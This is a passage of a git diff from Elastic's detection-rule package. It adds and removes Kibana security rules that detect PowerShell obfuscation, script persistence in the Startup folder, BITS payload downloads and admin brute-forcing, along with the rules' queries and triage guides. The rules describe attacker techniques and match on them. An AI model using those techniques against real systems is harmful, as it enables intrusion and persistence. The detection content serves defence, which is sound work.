Analyze the script's purpose and, if deemed safe, add exceptions for specific script block IDs or paths.\n- Frequent administrative scripts that concatenate strings for dynamic command execution could be flagged. Verify the script's source and function, then whitelist known safe scripts by user ID or host name.\n- Consider adjusting the threshold for pattern detection if legitimate scripts frequently exceed the current limit, ensuring that the rule remains effective without generating excessive false positives.\n\n### Response and remediation\n\n- Isolate the affected host immediately to prevent further spread of potentially malicious scripts across the network. Disconnect it from the network and any shared resources.\n- Terminate any suspicious PowerShell processes identified by the alert to halt the execution of potentially obfuscated scripts.\n- Conduct a thorough examination of the script block text and associated files to identify and remove any malicious code or artifacts. Use a secure, isolated environment for analysis.\n- Restore the affected system from a known good backup if malicious activity is confirmed and cannot be easily remediated.\n- Update and run a full antivirus and antimalware scan on the affected system to ensure no additional threats are present.\n- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are compromised.\n- Implement enhanced monitoring and logging for PowerShell activities across the network to detect similar obfuscation attempts in the future, ensuring that alerts are configured to notify the appropriate personnel promptly.\n", - "query": "from logs-windows.powershell_operational* metadata _id, _version, _index\n| where event.code == \"4104\"\n\n// Filter out smaller scripts that are unlikely to implement obfuscation using the patterns we are looking for\n| eval Esql.script_block_length = 
length(powershell.file.script_block_text)\n| where Esql.script_block_length > 500\n\n// replace the patterns we are looking for with the \ud83d\udd25 emoji to enable counting them\n// The emoji is used because it's unlikely to appear in scripts and has a consistent character length of 1\n| eval Esql.script_block_tmp = replace(\n powershell.file.script_block_text,\n \"\"\"['\"][A-Za-z0-9.]+['\"](\\s?\\+\\s?['\"][A-Za-z0-9.,\\-\\s]+['\"]){2,}\"\"\",\n \"\ud83d\udd25\"\n)\n\n// count how many patterns were detected by calculating the number of \ud83d\udd25 characters inserted\n| eval Esql.script_block_pattern_count = length(Esql.script_block_tmp) - length(replace(Esql.script_block_tmp, \"\ud83d\udd25\", \"\"))\n\n// keep the fields relevant to the query, although this is not needed as the alert is populated using _id\n| keep\n Esql.script_block_pattern_count,\n Esql.script_block_length,\n Esql.script_block_tmp,\n powershell.file.*,\n file.path,\n powershell.sequence,\n powershell.total,\n _id,\n _version,\n _index,\n host.name,\n agent.id,\n user.id\n\n// Filter for scripts that match the pattern at least twice\n| where Esql.script_block_pattern_count >= 2\n", - "related_integrations": [ - { - "package": "windows", - "version": "^3.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "Esql.script_block_length", - "type": "integer" - }, - { - "ecs": false, - "name": "Esql.script_block_pattern_count", - "type": "integer" - }, - { - "ecs": false, - "name": "Esql.script_block_tmp", - "type": "keyword" - }, - { - "ecs": false, - "name": "_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "_index", - "type": "keyword" - }, - { - "ecs": false, - "name": "_version", - "type": "long" - }, - { - "ecs": true, - "name": "agent.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.path", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.name", - "type": "keyword" - }, - { - "ecs": false, - "name": 
"powershell.file.script_block_entropy_bits", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_hash", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_length", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.file.script_block_surprisal_stdev", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_text", - "type": "text" - }, - { - "ecs": false, - "name": "powershell.file.script_block_unique_symbols", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.sequence", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.total", - "type": "long" - }, - { - "ecs": true, - "name": "user.id", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "f6d8c743-0916-4483-8333-3c6f107e0caa", - "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1027", - "name": "Obfuscated Files or Information", - "reference": "https://attack.mitre.org/techniques/T1027/" - }, - { - "id": "T1140", - "name": 
"Deobfuscate/Decode Files or Information", - "reference": "https://attack.mitre.org/techniques/T1140/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1059", - "name": "Command and Scripting Interpreter", - "reference": "https://attack.mitre.org/techniques/T1059/", - "subtechnique": [ - { - "id": "T1059.001", - "name": "PowerShell", - "reference": "https://attack.mitre.org/techniques/T1059/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 7 - }, - "id": "f6d8c743-0916-4483-8333-3c6f107e0caa_7", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_316.json b/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_316.json new file mode 100644 index 00000000000..32f55c6c95f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f7c4dc5a-a58d-491d-9f14-9b66507121c0_316.json 
@@ -0,0 +1,121 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "Identifies script engines creating files in the Startup folder, or the creation of script files in the Startup folder. Adversaries may abuse this technique to maintain persistence in an environment.",
+ "from": "now-9m",
+ "index": [
+ "winlogbeat-*",
+ "logs-endpoint.events.file-*",
+ "logs-windows.sysmon_operational-*",
+ "endgame-*",
+ "logs-m365_defender.event-*",
+ "logs-sentinel_one_cloud_funnel.*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Persistent Scripts in the Startup Directory",
+ "note": "## Triage and analysis\n\n### Performance\n\nThis rule may have low to medium performance impact due to the generic nature of VBS and JS scripts being loaded by Windows script engines.\n\n### Investigating Persistent Scripts in the Startup Directory\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for shortcuts created by wscript.exe or cscript.exe, or js/vbs scripts created by any process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "query": "file where host.os.type == \"windows\" and event.type != \"deletion\" and\n\n /* Call attention to file extensions that may be used for malicious purposes */\n /* Optionally, Windows scripting engine processes targeting shortcut files */\n (\n file.extension : (\"vbs\", \"vbe\", \"wsh\", \"wsf\", \"js\", \"jse\", \"sct\", \"hta\", \"ps1\", \"bat\", \"cmd\") or\n process.name : (\"wscript.exe\", \"cscript.exe\")\n ) and not (startsWith(user.domain, \"NT\") or endsWith(user.domain, \"NT\"))\n\n /* Identify files created or changed in the startup folder */\n and file.path : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp\\\\*\")\n",
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ },
+ {
+ "package": "windows",
+ "version": "^3.0.0"
+ },
+ {
+ "package": "m365_defender",
+ "version": "^3.0.0"
+ },
+ {
+ "package": "sentinel_one_cloud_funnel",
+ "version": "^1.0.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "file.extension",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "file.path",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "user.domain",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "f7c4dc5a-a58d-491d-9f14-9b66507121c0",
+ "severity": "medium",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Persistence",
+ "Resources: Investigation Guide",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend",
+ "Data Source: Sysmon",
+ "Data Source: Microsoft Defender for Endpoint",
+ "Data Source: SentinelOne"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0003",
+ "name": "Persistence",
+ "reference": "https://attack.mitre.org/tactics/TA0003/"
+ },
+ "technique": [
+ {
+ "id": "T1547",
+ "name": "Boot or Logon Autostart Execution",
+ "reference": "https://attack.mitre.org/techniques/T1547/",
+ "subtechnique": [
+ {
+ "id": "T1547.001",
+ "name": "Registry Run Keys / Startup Folder",
+ "reference": "https://attack.mitre.org/techniques/T1547/001/"
+ },
+ {
+ "id": "T1547.009",
+ "name": "Shortcut Modification",
+ "reference": "https://attack.mitre.org/techniques/T1547/009/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 316
+ },
+ "id": "f7c4dc5a-a58d-491d-9f14-9b66507121c0_316",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/f95972d3-c23b-463b-89a8-796b3f369b49_12.json b/packages/security_detection_engine/kibana/security_rule/f95972d3-c23b-463b-89a8-796b3f369b49_12.json
new file mode 100644
index 00000000000..6de4b723810
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/f95972d3-c23b-463b-89a8-796b3f369b49_12.json
@@ -0,0 +1,117 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "Identifies downloads of executable and archive files via the Windows Background Intelligent Transfer Service (BITS). Adversaries could leverage Windows BITS transfer jobs to download remote payloads.",
+ "from": "now-9m",
+ "index": [
+ "logs-endpoint.events.file-*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Ingress Transfer via Windows BITS",
+ "note": "## Triage and analysis\n\n### Investigating Ingress Transfer via Windows BITS\n\nWindows Background Intelligent Transfer Service (BITS) is a technology that allows the transfer of files between a client and a server, which makes it a dual-use mechanism, being used by both legitimate apps and attackers. When malicious applications create BITS jobs, files are downloaded or uploaded in the context of the service host process, which can bypass security protections, and it helps to obscure which application requested the transfer.\n\nThis rule identifies such abuse by monitoring for file renaming events involving \"svchost.exe\" and \"BIT*.tmp\" on Windows systems.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Gain context into the BITS transfer.\n - Try to determine the process that initiated the BITS transfer.\n - Search `bitsadmin.exe` processes and examine their command lines.\n - Look for unusual processes loading `Bitsproxy.dll` and other BITS-related DLLs.\n - Try to determine the origin of the file.\n - Inspect network connections initiated by `svchost.exe`.\n - Inspect `Microsoft-Windows-Bits-Client/Operational` Windows logs, specifically the event ID 59, for unusual events.\n - Velociraptor can be used to extract these entries using the [bitsadmin artifact](https://docs.velociraptor.app/exchange/artifacts/pages/bitsadmin/).\n - Check the reputation of the remote server involved in the BITS transfer, such as its IP address or domain, using threat intelligence platforms or online reputation services.\n - Check if the domain is newly registered or unexpected.\n - Use the identified domain as an indicator of compromise (IoCs) to scope other compromised hosts in the environment.\n - [BitsParser](https://github.com/fireeye/BitsParser) can be used to parse BITS database files to extract BITS job information.\n- Examine the details of the dropped file, and whether it was executed.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the involved executables using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process's `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n\n### False positive analysis\n\n- Known false positives for the rule include legitimate software and system updates that use BITS for downloading files.\n\n### Related Rules\n\n- Persistence via BITS Job Notify Cmdline - c3b915e0-22f3-4bf7-991d-b643513c722f\n- Unsigned BITS Service Client Process - 9a3884d0-282d-45ea-86ce-b9c81100f026\n- Bitsadmin Activity - 8eec4df1-4b4b-4502-b6c3-c788714604c9\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - If malicious activity is confirmed, perform a broader investigation to identify the scope of the compromise and determine the appropriate remediation steps.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restore the affected system to its operational state by applying any necessary patches, updates, or configuration changes.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "query": "file where host.os.type == \"windows\" and event.action == \"rename\" and\n process.name : \"svchost.exe\" and file.Ext.original.name : \"BIT*.tmp\" and \n (file.extension : (\"exe\", \"zip\", \"rar\", \"bat\", \"dll\", \"ps1\", \"vbs\", \"vbe\", \"wsh\", \"wsf\", \"sct\", \"js\", \"jse\", \"hta\", \"pif\", \"scr\", \"cmd\", \"cpl\") or\n file.Ext.header_bytes : \"4d5a*\") and \n \n /* noisy paths, for hunting purposes you can use the same query without the following exclusions */\n not file.path : (\"?:\\\\Program Files\\\\*\", \"?:\\\\Program Files (x86)\\\\*\", \"?:\\\\Windows\\\\*\", \"?:\\\\ProgramData\\\\*\\\\*\") and \n \n /* lot of third party SW use BITS to download executables with a long file name */\n not length(file.name) > 30 and\n not file.path : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp*\\\\wct*.tmp\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Adobe\\\\ARM\\\\*\\\\RdrServicesUpdater*.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Adobe\\\\ARM\\\\*\\\\AcroServicesUpdater*.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Docker Desktop Installer\\\\update-*.exe\"\n )\n",
+ "references": [
+ "https://attack.mitre.org/techniques/T1197/"
+ ],
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "file.Ext.header_bytes",
+ "type": "unknown"
+ },
+ {
+ "ecs": false,
+ "name": "file.Ext.original.name",
+ "type": "unknown"
+ },
+ {
+ "ecs": true,
+ "name": "file.extension",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "file.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "file.path",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 21,
+ "rule_id": "f95972d3-c23b-463b-89a8-796b3f369b49",
+ "severity": "low",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Defense Evasion",
+ "Tactic: Command and Control",
+ "Data Source: Elastic Defend",
+ "Resources: Investigation Guide"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0011",
+ "name": "Command and Control",
+ "reference": "https://attack.mitre.org/tactics/TA0011/"
+ },
+ "technique": [
+ {
+ "id": "T1105",
+ "name": "Ingress Tool Transfer",
+ "reference": "https://attack.mitre.org/techniques/T1105/"
+ }
+ ]
+ },
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0005",
+ "name": "Defense Evasion",
+ "reference": "https://attack.mitre.org/tactics/TA0005/"
+ },
+ "technique": [
+ {
+ "id": "T1197",
+ "name": "BITS Jobs",
+ "reference": "https://attack.mitre.org/techniques/T1197/"
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 12
+ },
+ "id": "f95972d3-c23b-463b-89a8-796b3f369b49_12",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/f9753455-8d55-4ad8-b70a-e07b6f18deea_6.json b/packages/security_detection_engine/kibana/security_rule/f9753455-8d55-4ad8-b70a-e07b6f18deea_6.json
deleted file mode 100644
index b9ad02588b9..00000000000
--- a/packages/security_detection_engine/kibana/security_rule/f9753455-8d55-4ad8-b70a-e07b6f18deea_6.json
+++ /dev/null
@@ -1,188 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "building_block_type": "default", - "description": "Identifies PowerShell scripts with an abnormally high proportion of non-alphanumeric characters, often resulting from encoding, string mangling, or dynamic code generation.", - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "Potential PowerShell Obfuscation via High Special Character Proportion", - "query": "from logs-windows.powershell_operational* metadata _id, _version, _index\n| where event.code == \"4104\"\n\n// Filter out smaller scripts that are unlikely to implement obfuscation using the patterns we are looking for\n| eval Esql.script_block_length = length(powershell.file.script_block_text)\n| where Esql.script_block_length > 1000\n\n// replace the patterns we are looking for with the \ud83d\udd25 emoji to enable counting them\n// The emoji is used because it's unlikely to appear in scripts and has a consistent character length of 1\n// Excludes spaces, #, = and - as they are heavily used in scripts for formatting\n| eval Esql.script_block_tmp = replace(powershell.file.script_block_text, \"\"\"[^0-9A-Za-z\\s#=-]\"\"\", \"\ud83d\udd25\")\n\n// count how many patterns were detected by calculating the number of \ud83d\udd25 characters inserted\n| eval Esql.script_block_pattern_count = Esql.script_block_length - length(replace(Esql.script_block_tmp, \"\ud83d\udd25\", \"\"))\n\n// Calculate the ratio of special characters to total length\n| eval Esql.script_block_ratio = Esql.script_block_pattern_count::double / Esql.script_block_length::double\n\n// keep the fields relevant to the query, although this is not needed as the alert is populated using _id\n| keep\n Esql.script_block_pattern_count,\n Esql.script_block_length,\n Esql.script_block_ratio,\n Esql.script_block_tmp,\n powershell.file.*,\n file.path,\n file.directory,\n powershell.sequence,\n powershell.total,\n _id,\n _version,\n _index,\n 
host.name,\n agent.id,\n user.id\n\n// Filter for scripts with high special character ratio\n| where Esql.script_block_ratio > 0.35\n\n// Exclude Noisy Patterns\n| where not file.directory like \"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Windows Defender Advanced Threat Protection\\\\\\\\DataCollection\\\\\\\\*\"\n // ESQL requires this condition, otherwise it only returns matches where file.directory exists.\n or file.directory IS NULL\n", - "related_integrations": [ - { - "package": "windows", - "version": "^3.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "Esql.script_block_length", - "type": "integer" - }, - { - "ecs": false, - "name": "Esql.script_block_pattern_count", - "type": "integer" - }, - { - "ecs": false, - "name": "Esql.script_block_ratio", - "type": "double" - }, - { - "ecs": false, - "name": "Esql.script_block_tmp", - "type": "keyword" - }, - { - "ecs": false, - "name": "_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "_index", - "type": "keyword" - }, - { - "ecs": false, - "name": "_version", - "type": "long" - }, - { - "ecs": true, - "name": "agent.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.directory", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.path", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.name", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_entropy_bits", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_hash", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_length", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.file.script_block_surprisal_stdev", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_text", - "type": "text" - }, - { - "ecs": false, - "name": "powershell.file.script_block_unique_symbols", - 
"type": "long" - }, - { - "ecs": false, - "name": "powershell.sequence", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.total", - "type": "long" - }, - { - "ecs": true, - "name": "user.id", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "f9753455-8d55-4ad8-b70a-e07b6f18deea", - "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "severity": "low", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Rule Type: BBR" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1027", - "name": "Obfuscated Files or Information", - "reference": "https://attack.mitre.org/techniques/T1027/" - }, - { - "id": "T1140", - "name": "Deobfuscate/Decode Files or Information", - "reference": "https://attack.mitre.org/techniques/T1140/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1059", - "name": "Command and Scripting Interpreter", - "reference": "https://attack.mitre.org/techniques/T1059/", - "subtechnique": [ - { - "id": "T1059.001", - "name": "PowerShell", - "reference": "https://attack.mitre.org/techniques/T1059/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - 
"version": 6 - }, - "id": "f9753455-8d55-4ad8-b70a-e07b6f18deea_6", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_114.json b/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_114.json deleted file mode 100644 index 36b50ddd6a1..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/f9790abf-bd0c-45f9-8b5f-d0b74015e029_114.json +++ /dev/null 
@@ -1,108 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies multiple consecutive logon failures targeting an Admin account from the same source address and within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to accounts.", - "from": "now-9m", - "index": [ - "logs-system.security*", - "logs-windows.forwarded*", - "winlogbeat-*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Privileged Account Brute Force", - "note": "## Triage and analysis\n\n### Investigating Privileged Account Brute Force\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address against an account that contains the `admin` pattern on its name, which is likely a highly privileged account.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
